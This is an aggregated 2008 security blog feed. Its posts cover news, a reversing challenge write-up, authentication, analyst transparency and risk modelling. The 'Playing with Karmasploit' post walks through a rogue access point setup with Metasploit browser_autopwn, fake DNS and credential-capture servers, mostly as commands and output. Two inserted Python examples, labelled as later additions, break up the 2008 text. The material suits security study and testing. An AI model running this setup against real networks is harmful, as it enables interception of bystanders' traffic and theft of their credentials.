Friday, August 15, 2008

Spliced feed for Security Bloggers Network


Friday News and Notes [Digital Bond]

Posted: 15 Aug 2008 06:59 AM CDT

  • The Department of Homeland Security announced the recipients of $11.7M in research contracts for cybersecurity. This is the funding source for Digital Bond’s Quickdraw project.
  • The NERC CIP products and services market offerings continue to expand. The latest is a NERC CIP Training course by Industry Compliance Institute. Caveat emptor: we have no experience with this vendor or course. A one-page website? But then again, a fancy website doesn’t always equal quality offerings.
  • SEL also has a three day Cybersecurity for Electric Utilities course.
  • While CC-Link is an international control system protocol, it is driven by Mitsubishi and the Japanese markets. Initial versions of the protocol specifications are in Japanese. The latest protocol specification, CC-Link IE, is now available in English. We will have a SCADApedia page up shortly.

SecuraBit Episode 8 [SecuraBit]

Posted: 15 Aug 2008 06:01 AM CDT

On this episode of SecuraBit: Jason Mueller, Chris Gerling, Anthony Gartner. Back from a three week hiatus.

  • Defcon and BlackHat
  • Defcon parties: Core Impact party, Cisco party, Isight party, I-hacked party, StillSecure Freakshow party
  • ChicagoCon: Boot Camps: Oct 27 - 31; Conference: Oct 31 - Nov 1
  • Defcon badges: ran out of badges on first day; TV-B-Gone built into the badges; Servo hacks the badges
  • Podcasters Meetup
  • [...]



F-Secure Khallenge Level 1 [ISIS Blogs]

Posted: 15 Aug 2008 12:18 AM CDT

Thanks to Aleksey and Phn1x for dealing with my constant stream of questions while reversing this. You’d think it was the first time I opened a debugger!

The level 1 challenge was a binary that asked for input and, if your input was correct, printed out an e-mail address you could use to get the level 2 binary. The Khallenge is a contest of speed, so the first person to get to and beat level 3 wins. Unfortunately, I solved level 1 after the contest ended and the level 2 and 3 binaries aren’t online yet, so no prizes and no info on those.

The first thing I did was open the binary in a disassembler and try to get a general feel for it. This would help me develop an attack strategy. In IDA, you can easily identify that your input is being XOR’d almost a dozen times and with a global variable somewhere. It quickly overwhelmed me, so I took out a pen and paper and started writing things down. I also had lots of problems identifying exact addresses and byte offsets in IDA (I haven’t used it much before), so I switched to Immunity Debugger at this point.

The first set of instructions your input needs to pass through are at addresses 69001081 to 6900108F, and it turns out they are a compiler-optimized strlen function. Pseudocode for these addresses looks like this:

if(strlen(input) != 4)
    fail();
else
    ...

(Screenshot: compiler-optimized strlen)

The XORs start immediately after this check. After staring at it for a while, you will figure out that your input is being used as a key to decrypt a global variable located at 0x690030D0. This global variable becomes the answer e-mail. I wrote out the encrypted e-mail in a column and mapped the XOR’d input bytes to it. Here is that table (encompasses addresses 69001095 to 690010F6):

e-mail @ 0x690030D4        input @ 69003100
e-mail[0]: 0x07    XOR    input[0]
e-mail[1]: 0x2E    XOR    input[1]
e-mail[2]: 0x35    XOR    input[2]
e-mail[3]: 0x29    XOR    input[3]
e-mail[4]: 0x70    XOR    input[0]
e-mail[5]: 0x20    XOR    input[1]
e-mail[6]: 0x76    XOR    input[2]
e-mail[7]: 0x68    XOR    input[3]

(Screenshot: obfuscated XORs)

After all the XORs, the application starts to check the final values of 4 select bytes in the e-mail buffer.

e-mail[4]: 0x70    XOR    input[0] == 0x32
e-mail[1]: 0x2E    XOR    input[1] == 0x61
e-mail[6]: 0x76    XOR    input[2] == 0x30
e-mail[3]: 0x29    XOR    input[3] == 0x79

(Screenshot: the compares that give it away)

If you do the XOR in reverse, you can find out the input they are looking for:

0x70    XOR    0x32 = input[0] = 0x42 = B
0x2E    XOR    0x61 = input[1] = 0x4F = O
0x76    XOR    0x30 = input[2] = 0x46 = F
0x29    XOR    0x79 = input[3] = 0x50 = P

Run the executable, put BOFP into the prompt, all the XORs happen, all the checks pass, and the e-mail buffer decrypts to “Easy2o08.” Done!

(Screenshot: the completed khallenge)
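The same derivation as an added Python example (mine, not part of the original write-up): it takes the eight ciphertext bytes and the four compares from the tables above, recovers the four-byte key by XORing each compared ciphertext byte with the value the binary expects, then decrypts the whole buffer with the repeating key. The function names are my own, and the solver is written for any repeating-key length, so it also reports conflicting or unconstrained key bytes, which the four-byte case above never hits.

```python
# Added example (not from the original write-up): reverse the Khallenge
# level-1 XOR check in code.  The eight ciphertext bytes, the four compares
# and the repeating four-byte key layout are taken from the post; the
# function names and the generalisation to other key lengths are mine.

CIPHERTEXT = bytes([0x07, 0x2E, 0x35, 0x29, 0x70, 0x20, 0x76, 0x68])  # e-mail buffer
KEY_LEN = 4                                   # strlen(input) must be 4
# (ciphertext index, byte the binary compares against) for the four checks
CHECKS = [(4, 0x32), (1, 0x61), (6, 0x30), (3, 0x79)]


def recover_key(ciphertext, checks, key_len):
    """Solve a repeating-key XOR from known (index, expected_plaintext) pairs.

    Each check asserts ciphertext[i] ^ key[i % key_len] == expected, so
    key[i % key_len] = ciphertext[i] ^ expected.  Conflicting constraints on
    one key byte, or a key byte no check touches, are reported as errors.
    """
    key = [None] * key_len
    for i, expected in checks:
        k = i % key_len
        candidate = ciphertext[i] ^ expected
        if key[k] is not None and key[k] != candidate:
            raise ValueError(f"conflicting constraints for key[{k}]")
        key[k] = candidate
    missing = [k for k, b in enumerate(key) if b is None]
    if missing:
        raise ValueError(f"key bytes {missing} are unconstrained")
    return bytes(key)


def xor_decrypt(ciphertext, key):
    """Apply the repeating-key XOR the binary performs on the e-mail buffer."""
    return bytes(c ^ key[i % len(key)] for i, c in enumerate(ciphertext))


def solve(ciphertext=CIPHERTEXT, checks=CHECKS, key_len=KEY_LEN):
    """Return (input_string, decrypted_buffer) for the level-1 binary."""
    key = recover_key(ciphertext, checks, key_len)
    plaintext = xor_decrypt(ciphertext, key)
    # Re-run the binary's own compares on the decrypted buffer; if they fail,
    # the constraint model above does not match the disassembly.
    assert all(plaintext[i] == expected for i, expected in checks)
    return key.decode("ascii"), plaintext.decode("ascii")


if __name__ == "__main__":
    key, email = solve()
    print(f"input = {key!r}, decrypted buffer = {email!r}")  # BOFP / Easy2o08
```

Running it reproduces the write-up: the recovered input is BOFP and the buffer decrypts to Easy2o08. The conflict check matters when you have transcribed a compare wrongly from the debugger: an impossible key byte shows up immediately instead of as a silently garbled decryption.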

Thanks again Aleksey and Phn1x!

This is a normal upgrade for me… []

Posted: 14 Aug 2008 11:51 PM CDT

Wow…getting our LANsight Security Management Appliances upgraded has been less than easy.  Luckily El Sidekick considered this a normal upgrade for him. I can always count on him to find the good in most anything.  We did manage to get them upgraded to the 5.1 code tonight (just finished at 11:30 tonight) by stepping up to a code level between what we were running and the latest version.  The first opinion of the new interface is that it is a definite improvement.  The dashboard has more/better detail as to what has actually been going on in the environment.  One thing I would like to see, which I don’t think the previous versions had either, is the hostname displayed on the dashboard somewhere.  Having two sites with two different management appliances, sometimes it can get confusing when looking at both of them at the same time.

In other news…Alan is back!  Sounds like he’s been through quite the ordeal.  Sit down and have a cyber-beer.  You deserve it!

Up is down, right is left, dogs and cats living together…Chinese hackers on holiday [The Dark Visitor]

Posted: 14 Aug 2008 08:10 PM CDT

Yeah, the posts have been coming slow lately but some of you may have heard about a little event going on in China called the Olympics. Chinese hackers watching sporting events, worried about foreign hackers attacking them…my world is completely upside down.

The boys and girls from, the largest Chinese hacker training site, take over 20 of their “employees” out to enjoy the games. Plus, they love them some Mr. Yao Ming:

More pictures of their adventure here if you are interested…but pretty much the same as these.


Bye-Bye Passwords - Maybe? []

Posted: 14 Aug 2008 05:47 PM CDT

I came across an interesting New York Times story by Randall Stross over the weekend that discusses how we should be replacing passwords with information cards and how so-called single sign-on (SSO) services (e.g., OpenID and I’m sure any commercial product SSO efforts as well) just don’t add the security we need. Here are the relevant snippets from the article:

”The solution urged by the experts is to abandon passwords - and to move to a fundamentally different model, one in which humans play little or no part in logging on. Instead, machines have a cryptographically encoded conversation to establish both parties’ authenticity, using digital keys that we, as users, have no need to see. In short, we need a log-on system that relies on cryptography, not mnemonics. As users, we would replace passwords with so-called information cards, icons on our screen that we select with a click to log on to a Web site. The click starts a handshake between machines that relies on hard-to-crack cryptographic code.”

“We won’t make much progress on information cards in the near future, however, because of wasted energy and attention devoted to a large distraction, the OpenID initiative. OpenID promotes “Single Sign-On”: with it, logging on to one OpenID Web site with one password will grant entrance during that session to all Web sites that accept OpenID credentials. OpenID offers, at best, a little convenience, and ignores the security vulnerability inherent in the process of typing a password into someone else’s Web site.”

Strangely enough, Microsoft seems to be involved in this new information card technology. It sounds a lot like Microsoft’s well-known CardSpace technology. As a matter of fact, Microsoft is part of a new Information Card Foundation (ICF) along with other heavyweights such as Equifax, Google, Novell, Oracle and PayPal. But then Microsoft is also a supporter of OpenID. How ironic…

The only issue I see with these information cards is that they are desktop icons you click to log in, as described in the New York Times story. When I’m logging into Windows at the beginning of the day, what do I do then? I won’t have access to these information card icons yet. Passwords anyone? Plus this doesn’t alleviate the problem of computers being infected with malware. If I can click it, a Trojan or virus can too. I agree with all the points about OpenID and other SSO efforts… but they’re just so darn convenient! There are a lot of questions that need to be addressed here and I’m sure we’ll all be learning a lot more about this technology as it evolves.

What do you think about this new authentication technology? Does your organization have plans to replace passwords with information cards? Here’s a link to the New York Times article.

Transparency []

Posted: 14 Aug 2008 05:40 PM CDT

There’s been a bit of debate on the blogs recently over the role of analysts, and how they pay their bills. It started with the Hoff, and Alan Shimel followed up (no link right now due to Alan’s blog issues). I know Chris wasn’t calling me out on this one (because he told me), but I do recognize I put a lot of content out there that people trust to help make decisions, and it’s only fair they know of any potential conflicts of interest I might have.

I’m not going to get into a big debate over the role of analysts in the IT industry. I think the good ones offer tremendous value, but I’m clearly biased. Where I’m not biased is in my positions. No matter who pays the bills, I recognize that most of my value in the security world is my objectivity. Everything I write is for the end user, even if a piece is sponsored by vendor or written internally for an investor. As soon as I forget that, my career is over.

It’s one thing for me to claim that, and another for you to believe it. I don’t assume you’ll take me at my word, and that’s why I throw everything out here on the blog and leave it for public comment. If you think I’m biased, call me on it. I don’t think I’ve ever deleted a comment, other than spam and personal insults. Insulting argument is okay, but I decline to host pointless insults — there are lots of other places for that, and this is *my* (our) soapbox — you can set up your own website or find another board if you just want to flame online; there’s no shortage of venues. We also encourage vendors to comment, as long as they identify themselves clearly if it’s on something related to their offerings.

It’s also only fair you know who pays my bills, and my policies on papers and webcasts. Right now about 85% of our income is from vendors, with the remaining 15% split between investment clients, end users, and media companies (magazines/conferences). We’re expensive for consultants, and don’t typically engage in long-term projects, which cuts out a lot of paid end user business, although we do a ton of (short) free calls, emails, and meetings when I’m traveling.

As for papers and webcasts, the rules are we (Adrian and myself) will work with a vendor on a topic, but they have no input on the content. To make this work we give them detailed outlines of what they can expect before we write it, and all contracts are written so that if they don’t like the content, we go our separate ways and we won’t charge them. In all cases we (Securosis) own the content and only license it to the vendors for (usually) a year. And yes, I’ve walked away from deals, although we haven’t had one fall apart after the draft was written, since we prefer to work out any conflicts before we start. Also, all the content appears first on the blog for public input- this is the best way we can think of to be transparent.

So who pays the bills? I can’t talk about our strategy clients, but we’ve done public work (papers/webcasts/speaking) with all of the following vendors (I’m assuming you don’t care about the media companies):

  • Core Security
  • Guardium
  • Imperva
  • Mozilla
  • Oracle
  • Powertech
  • RSA
  • Securno
  • Sentrigo
  • Symantec
  • Tizor
  • Vericept
  • Websense
  • Winmagic
  • Workshare

There aren’t any surprises here- I’ve announced all those papers, webcasts, and such here on the blog already, along with who the sponsor was. No, I can’t talk about all our clients, but if they aren’t on that list, they’ve never sponsored any content. Another thing we do to balance objectivity is work with competitors- we won’t engage in contracts that exclude us from working with competitors.

This was all already public, so I’m not giving away any big secrets. Also, don’t take this as a “look how great we are!” post; we’re doing this for transparency, not marketing. We’ve also worked with SANS, CMP Media, TechTarget, some large financials (doesn’t everyone?), and a few investment types. That doesn’t count the end users we don’t charge.

That’s it. If you think we’re biased, call us on it and we won’t delete the comment. Our goal is to be as open as possible so you know where the information you’re reading comes from. Do we push some technologies? Yep, because we think they can help. We’ve definitely turned away work for things we don’t believe in.


DAVIX 1.0.1 Officially Launched [iplosion security]

Posted: 14 Aug 2008 05:39 PM CDT

After months of building and testing, the long anticipated release of DAVIX - The Data Analysis & Visualization Linux® - arrived last week during Blackhat/DEFCON in Las Vegas. It is a very exciting moment for me and I am curious to see how the product is received by the audience. So far the ISO image has been downloaded at least 600 times from our main distribution server. Downloads from the mirrors are not counted.

Additionally, Raffael Marty’s book Applied Security Visualization is now available in print. DAVIX was built with this particular book in mind. If you are looking for a methodology and not just a workable tool set, then the book is what you are looking for. The book covers all steps from the very basics to complete case studies and contains many hands-on examples. Therefore, the book together with DAVIX 1.0.1 is the perfect match for getting you started with security visualization. For a preview of the book’s content check out the rough cuts version.

All those eager to get their hands dirty immediately can find a description as well as the download links for the DAVIX ISO image on the DAVIX homepage. I wish you happy visualizing!

Blog Moved! [Security Uncorked]

Posted: 14 Aug 2008 02:22 PM CDT

Blog Moved!

The SecurityUncorked blog has moved to a new hosting location. The domains and .net will still take you to the blog site, but please discontinue use of this link (

For now, this old location will remain active until all/most incoming links have been updated but please be sure to update your favorites or links to



First Amazon for Applied Security Visualization Book [Raffy - Security Data Visualization]

Posted: 14 Aug 2008 02:21 PM CDT

I just saw the first Amazon review for my book. I just don’t understand why the person only gave it four stars, instead of five ;) Just kidding. Thanks for the review! Keep them coming!

Playing with Karmasploit Part 1 [Carnal0wnage Blog]

Posted: 14 Aug 2008 01:53 PM CDT

HD Moore released some documentation to get karmasploit working with the framework.

First you'll have to get an updated version of aircrack-ng because you'll need airbase-ng. I had 0.9.1 so I had to download and install the current stable version (1.0-rc1). If you have an old version you should be good dependency-wise. Ah, but there is a patch (I used the 2nd patch), so apply that before you make/make install.

You may also need a current version of madwifi drivers (I used 0.9.4). I recently updated my kernel and that had hosed all my madwifi stuff up, so I had to reinstall. Ok, so you've got an updated version of aircrack, patched airbase-ng, and madwifi drivers, and can inject packets? Let's continue.

Let's do our aireplay-ng test to see if things are working:

root@WPAD:/home/cg# aireplay-ng --test ath40
19:55:44 Trying broadcast probe requests...
19:55:44 Injection is working!
19:55:46 Found 5 APs
19:55:46 Trying directed probe requests...
19:55:46 00:1E:58:33:83:71 - channel: 4 - 'vegaslink'
19:55:52 0/30: 0%
19:55:52 00:14:06:11:42:A2 - channel: 4 - ''
19:55:58 0/30: 0%
19:55:58 00:13:19:5F:D1:D0 - channel: 6 - 'stayonline'
19:56:03 Ping (min/avg/max): 20.712ms/26.964ms/31.267ms Power: 14.80
19:56:03 5/30: 16%
19:56:03 00:14:06:11:42:A0 - channel: 4 - 'cheetahnetwork'
19:56:09 0/30: 0%
19:56:09 00:14:06:11:42:A1 - channel: 4 - 'Adult***Vegas'
19:56:15 0/30: 0%

Looks like we are good.

Now just follow the steps in the documentation, I installed dhcpd3 and set up my conf file, I did a svn update on the metasploit trunk, made sure the sqlite3 stuff was working and then tweaked my karma.rc file for the IP address I was on. Pretty straightforward.

With all the config files set up it's pretty easy to get things going.

root@WPAD:/home/cg# airbase-ng -P -C 30 -v ath40
02:59:55 Created tap interface at0
02:59:55 Access Point with BSSID 00:19:7E:8E:72:87 started.
02:59:57 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
02:59:58 Got broadcast probe request from 00:14:A5:2E:BE:2F
02:59:59 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
03:00:02 Got broadcast probe request from 00:90:4B:C1:61:E4
03:00:03 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
03:00:05 Got broadcast probe request from 00:14:A5:48:CE:68
03:00:07 Got broadcast probe request from 00:90:4B:EA:54:01
03:00:09 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
03:00:12 Got directed probe request from 00:13:E8:A8:B1:93 - "stayonline"
03:01:34 Got an auth request from 00:21:06:41:CB:50 (open system)
03:01:34 Client 00:21:06:41:CB:50 associated (unencrypted) to ESSID: "tmobile"
03:04:19 Got an auth request from 00:1B:77:23:0A:72 (open system)
03:04:19 Client 00:1B:77:23:0A:72 associated (unencrypted) to ESSID: "LodgeNet
**You get the idea...
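From the defender's side, the output above is also a detection signature: one BSSID handing out associations for "tmobile", "LodgeNet" and whatever else nearby clients probe for is not how a real access point behaves. The following Python is an added example of mine, not part of the karmasploit documentation or of this post; the probe-response line format, the sample frames, the SSID inventory and the threshold are all constructed for illustration.

```python
# Added example (not from the original post): a defender-side check for the
# behaviour shown in the airbase-ng output above.  A KARMA-style access point
# answers every directed probe and lets clients associate to whatever ESSID
# they asked for, so one BSSID ends up serving many unrelated network names.
# The record format, threshold and sample data are my own constructions, not
# the output of any real wireless monitoring tool.
import re
from collections import defaultdict

# Constructed probe-response frames as a monitor-mode sensor might log them.
# The first BSSID behaves like the airbase-ng AP above and answers every
# directed probe with the requested SSID; the second is a legitimate AP.
SAMPLE_FRAMES = """\
03:01:34 probe-response bssid=00:19:7E:8E:72:87 ssid="tmobile" dst=00:21:06:41:CB:50
03:01:35 probe-response bssid=00:19:7E:8E:72:87 ssid="delonte" dst=00:1B:63:EF:9F:EC
03:01:40 probe-response bssid=00:19:7E:8E:72:87 ssid="stayonline" dst=00:13:E8:A8:B1:93
03:04:19 probe-response bssid=00:19:7E:8E:72:87 ssid="LodgeNet" dst=00:1B:77:23:0A:72
03:04:25 probe-response bssid=00:19:7E:8E:72:87 ssid="corp-wifi" dst=00:14:A5:2E:BE:2F
03:05:02 probe-response bssid=00:11:22:33:44:55 ssid="corp-wifi" dst=00:14:A5:2E:BE:2F
03:05:03 probe-response bssid=00:11:22:33:44:55 ssid="corp-wifi" dst=00:90:4B:C1:61:E4
"""

# Hypothetical inventory: sanctioned SSIDs and the BSSIDs allowed to serve them.
KNOWN_APS = {"corp-wifi": {"00:11:22:33:44:55"}}

FRAME_RE = re.compile(
    r'^(?P<time>\d\d:\d\d:\d\d) probe-response bssid=(?P<bssid>[0-9A-Fa-f:]{17}) '
    r'ssid="(?P<ssid>[^"]*)" dst=(?P<dst>[0-9A-Fa-f:]{17})$'
)


def parse_frames(text):
    """Parse sensor lines into (time, bssid, ssid, dst) tuples; skip malformed lines."""
    frames = []
    for line in text.splitlines():
        m = FRAME_RE.match(line.strip())
        if m:
            frames.append((m["time"], m["bssid"].upper(), m["ssid"], m["dst"].upper()))
    return frames


def analyse(frames, known_aps=KNOWN_APS, max_ssids=3):
    """Return {bssid: [finding, ...]} for APs that look like KARMA-style or evil-twin rogues."""
    ssids_by_bssid = defaultdict(set)
    for _, bssid, ssid, _ in frames:
        ssids_by_bssid[bssid].add(ssid)

    findings = defaultdict(list)
    for bssid, ssids in ssids_by_bssid.items():
        # A radio legitimately serves a handful of SSIDs; answering to many
        # unrelated names is the signature of an AP that echoes probe requests.
        if len(ssids) >= max_ssids:
            findings[bssid].append(f"answers {len(ssids)} distinct SSIDs (KARMA-style)")
        # Any BSSID serving a sanctioned SSID without being in the inventory
        # is an evil twin of that network, however few SSIDs it advertises.
        for ssid in sorted(ssids & set(known_aps)):
            if bssid not in known_aps[ssid]:
                findings[bssid].append(
                    f"serves sanctioned SSID {ssid!r} but is not an inventoried AP")
    return dict(findings)


def report(text=SAMPLE_FRAMES):
    """Convenience wrapper: parse the constructed log and analyse it."""
    return analyse(parse_frames(text))


if __name__ == "__main__":
    for bssid, issues in report().items():
        for issue in issues:
            print(f"{bssid}: {issue}")
```

On the constructed sample the rogue BSSID is flagged twice (five distinct SSIDs, and a claim to serve corp-wifi without being inventoried) while the legitimate AP produces nothing. The two checks are deliberately independent: the SSID-count rule catches an echo-everything AP even when it never names one of your networks, and the inventory rule catches a targeted evil twin that only ever advertises one.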

airbase-ng creates an at0 tap, so you have to configure it and set the MTU size (all this is from the karmasploit documentation).

root@WPAD:/home/cg/evil/msf3# ifconfig at0 up netmask

root@WPAD:/home/cg/evil/msf3# ifconfig at0 mtu 1400

root@WPAD:/home/cg/evil/msf3# ifconfig ath40 mtu 1800

After we get our IP stuff straight we need to tell the dhcpd server which interface to hand out IPs on.

root@WPAD:/home/cg/evil/msf3# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0

Internet Systems Consortium DHCP Server V3.0.5
Copyright 2004-2006 Internet Systems Consortium.
All rights reserved.
For info, please visit
Wrote 4 leases to leases file.
Listening on LPF/at0/00:19:7e:8e:72:87/172.16.1/24
Sending on LPF/at0/00:19:7e:8e:72:87/172.16.1/24
Sending on Socket/fallback/fallback-net

After that we run our karma.rc file using msfconsole.

root@WPAD:/home/cg/evil/msf3# ./msfconsole -r karma.rc
=[ msf v3.2-release
+ -- --=[ 304 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
=[ 79 aux
resource> load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
resource> db_create /root/karma.db
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/karma.db
resource> use auxiliary/server/browser_autopwn
resource> setg AUTOPWN_HOST
resource> setg AUTOPWN_PORT 55550
resource> setg AUTOPWN_URI /ads
resource> set LHOST
resource> set LPORT 45000
LPORT => 45000
resource> set SRVPORT 55550
SRVPORT => 55550
resource> set URIPATH /ads
URIPATH => /ads
resource> run
[*] Starting exploit modules on host
[*] Started reverse handler
[*] Using URL:
[*] Local IP:
[*] Server started.
[*] Started reverse handler
[*] Using URL:
[*] Local IP:
[*] Server started.
[*] Started reverse handler
[*] Using URL:
[*] Local IP:
[*] Server started.
[*] Started reverse handler
[*] Using URL:
[*] Local IP:
[*] Server started.
[*] Started reverse handler
[*] Using URL:
[*] Local IP:
[*] Server started.
[*] Started reverse handler
[*] Using URL:
[*] Local IP:
[*] Server started.
[*] Started reverse handler
[*] Using URL:
[*] Local IP:
[*] Server started.
[*] Started reverse handler
[*] Using URL:
[*] Local IP:
[*] Server started.
[*] Started reverse handler
[*] Using URL:
[*] Local IP:
[*] Server started.
[*] Started reverse handler
[*] Server started.
[*] Using URL:
[*] Local IP:
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 110
SRVPORT => 110
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 995
SRVPORT => 995
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/ftp
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/imap
resource> set SSL false
SSL => false
resource> set SRVPORT 143
SRVPORT => 143
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/imap
resource> set SSL true
SSL => true
resource> set SRVPORT 993
SRVPORT => 993
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/smtp
resource> set SSL false
SSL => false
resource> set SRVPORT 25
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/smtp
resource> set SSL true
SSL => true
resource> set SRVPORT 465
SRVPORT => 465
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/fakedns
resource> unset TARGETHOST
Unsetting TARGETHOST...
resource> set SRVPORT 5353
SRVPORT => 5353
resource> run
[*] Auxiliary module running as background job
resource> use auxiliary/server/fakedns
resource> unset TARGETHOST
Unsetting TARGETHOST...
resource> set SRVPORT 53
resource> run
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 80
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 8080
SRVPORT => 8080
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 443
SRVPORT => 443
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 8443
SRVPORT => 8443
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
msf auxiliary(http) >

Next post we'll see karmasploit in action.

Over 50% of client systems are EV aware [Tim Callan's SSL Blog]

Posted: 14 Aug 2008 12:48 PM CDT

We recently hit a very cool milestone, which is that over half the client systems in use today are capable of distinguishing between Extended Validation SSL Certificates and traditional certificates. In other words, the combined market share of IE7, IE8 (very small), Firefox 3, and Opera 9.5 adds up to in excess of 52% of browsers in use. What's especially cool about that is it's an increase of almost 3% in a single month, which is quite a growth trajectory.

People have been writing about this milestone, such as this blogger at DaniWeb. The blogger questions how well six or seven thousand online businesses compare to the millions of Web sites that are out there, and I think that's a question that deserves an answer.

It's important to distinguish between the mass of Web sites out there that are strictly publishing content and the considerably smaller subset that actually engage in some sort of online business. EV SSL today very much is focused on those sites where consumers are asked to share sensitive information with a business, something like an account login or a credit card number or personally identifiable information. These are the pieces of information that criminals want to steal, and these are the sites that phishing and malware and other attacks are directed at. A consumer doesn't need protection from phishing attacks when visiting your personal blog or Star Wars fan site or even your company's brochureware site. It's only where the actual commerce takes place.

Therefore, you shouldn't consider the full footprint of Web sites in the world but rather this subset that is conducting business. I don't know exactly how to measure that number, but I expect it's orders of magnitude smaller than the number of total Web sites out there.

Now, there's an implication in this posting that maybe in the long run sites without commerce taking place will still want an EV cert in order to demonstrate their genuine identity. I think that is a possibility down the road, but today we're really focused on those sites where there is information to protect.


Posted: 14 Aug 2008 12:29 PM CDT

Originally Posted: 13 Aug 2008 10:24 AM CDT  Reposted due to server issues.

So much traveling, so little blogging.  Sorry everyone.  I've gotta say first that I really enjoyed meeting readers and friends of the blog this past two weeks.

Today, allow me to update you on FAIR and the movement towards a formal, open standard.  There's a couple of cool things going on in our little risk-world.

First, The Open Group Security Forum continues to move towards a formal adoption of FAIR.


Our meeting in Chicago a few weeks ago was great, but also slightly disturbing for me. I got pronoun-confusion syndrome.   I'm used to using the "we" pronoun to refer to RMI, or Jack and myself as we vet the models.  So without even thinking I would say "we have been looking at how loss occurs, and may want to change the model some" and The Open Group Members freaked out (rightfully so).  Adrian Seccombe gently reminded me that the "we" was now the Security Forum, and that "we" didn't go changing things at will without vetting against each other.  Man I love this stuff.  I get to run our thoughts and ideas past some great folks now - you know, those smart people who tend to have really complex problems and are trying hard to solve them.

Formal Adoption:  Soon, Very Soon Now

Formal Adoption basically means we've made this document, everyone is close to saying that they generally like it, and once that finally happens then "bam", we're ready to move onward and upward with better things (see Cookbooks, below).  We've got a couple of changes to the current document that have been requested that aren't a big deal.  For example, one request is that we make some statement about general applicability of FAIR to risk domains outside of the IT realm.   But once additions like that and others are done, this long process should be complete.

New Document Moving Towards Public Release:

We've got a basic document that should be public in the next few weeks on "What Makes a Good Risk Assessment Methodology" - written by yours truly and Jack.  It's a very high-level document, and serves two purposes:

  • For novices it helps parse out what is important in any undertaking to understand corporate risk (the repeated discussions on the ISO 27001 mailing list make me think it would be a place ripe for such a document).
  • For those who "know" risk, it helps to re-establish some fundamental principles like the use of scales (ratio, please), the implications of dealing in probabilities, what attributes like consistency and defensibility mean, how "risk" should be reported to the business (something you know, meaningful) and so on.

When this doc is deemed ready for public consumption I'll be sure to post on this blog here.


One interesting thing that came up in the Chicago meeting was that ENISA (The European Network and Information Security Agency) developed a very nice document that reviewed something like 18 different risk assessment methodologies against their Criteria for Goodness.  FAIR was one of the ones they reviewed, and we (the royal "we" used there to include all us FAIR-Folk) did awfully well.  Things of interest:

  • They based their work on the current introduction paper which is not at all a step-by-step guide towards an organizational risk assessment (what ENISA really wanted) and we did pretty well.  Well enough that if we had developed a paper along the lines of NIST 800-30 or OCTAVE for the use of FAIR in a formal process, we could have done really, really well.  Like won-the-bake-off kind of well.
  • FAIR is actually not at all incongruous with many of the risk assessment methodologies offered, and in fact complements many of them by letting those methodologies develop real, structured probabilities.  Think OCTAVE, where they basically say "math is (probabilities are) hard, so if you want to do them for reals, good luck!  But here's a nonsensical way to do things if you want to believe in magic-fairy risk".  FAIR fits right in there by stomping on the magic-fairy risk with the jack-boots of rationality.  FAIR similarly helps other risk standards that might lack structured probability development.

So The Open Group Security Forum decided that though we could create a new document and totally p0wn any future ENISA bake-off, there wasn't much demand for the development of that documentation by the membership  - a point which was made quite apparent at the beginning of the discussion when one large European company CISO asked "What's ENISA?"  Relevancy is everything, I suppose.

But that second item up there - the one about helping rather than competing with other "risk assessment methodologies" - really struck a chord.  So "we" (The Security Forum) are going to develop some "Cookbooks" that basically are high-level documents that say "If you want to use FAIR with (OCTAVE/COSO/CoBIT/Whatever) here's how it fits, makes it better, and improves your life."  I'm pretty excited about these, and our first document looks like it's going to be COSO integration.


Finally, many people have asked me "Why work with The Open Group?"  There are many reasons, to be sure, but I will give you one example.  Members of the Security Forum there are not only great at vetting the model and getting consensus on risk and risk factors - but they're quick to start applying.  So in Chicago, I thought I'd be talking about FAIR and the standard and fighting groupthink.  Nope.  Not at all.  In fact, the forum members spent more time suddenly discussing use of FAIR in a new Trust Model they're developing.  So all of the sudden, I'm part of a new and exciting project to develop a Trust Model - how cool is that?  While formal adoption of the Trust Model will be necessarily long and deliberate - the collaboration and development is happening much faster than I can keep up with.  But if you all will allow me, it will help me get my head around it all by blogging about it later this week.  So be prepared to read about me dealing in "Trust" a little bit.

I'm back! [StillSecure, After All These Years]

Posted: 14 Aug 2008 12:12 PM CDT

It has certainly been an interesting week.  If there is anything else you want to know about me that has not already been posted, please feel free to send me your questions.  As most of you know, on Sunday morning my blog was hijacked/hacked as well as my yahoo mail address and the domain for this blog.  A lot of my personal information from these sources was posted on a public message list, along with some particularly hateful, ignorant, anti-Semitic ranting.  This event while traumatic has also resulted in some positives.

First of all let me say that I cannot go into a lot of the details of how this took place, as I am working with the authorities in this matter.  Secondly, let me say that all of the information exposed was my own personal information.  StillSecure infrastructure was not pierced or exposed at all, though the StillSecure SAT team treated this as a major breach and pulled out all of the stops in investigating and protecting our corporate infrastructure.

